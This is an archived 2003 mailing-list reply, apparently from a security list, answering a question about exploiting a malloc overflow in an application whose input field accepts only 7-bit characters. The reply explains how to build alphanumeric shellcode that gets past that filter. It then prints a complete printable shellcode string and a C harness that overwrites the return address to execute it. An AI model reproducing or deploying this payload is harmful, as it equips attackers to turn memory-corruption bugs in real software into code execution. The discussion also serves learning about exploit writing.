On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote: > This is my first post and I'm looking for some documentation. > A friend of mine has produced a segfault with malloc vulnerability on an > application. > We would like to produce something more interesting. > The field overflowed can accept only characters between 0 and 128. Any > other character is replaced with a whitespace. > > Can we inject shellcode with only this characters avaible? > Can you suggest me documentation about shellcode writing? The simplest thing to do is to write a simple program that will run a shell in C, and generate the assembly output for it with GCC -s, this will give you a starting point. After that you must filter out the opcodes and values which contain invalid characters. Using add's etc will save you some effort. Here's a simple sample: char shellcode[] = "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi" "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX" "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02" "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; return 0; } Steve -- Steve Kemp <steveat_private> Intasys Billing Technologies Ltd
This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 18:20:35 PDT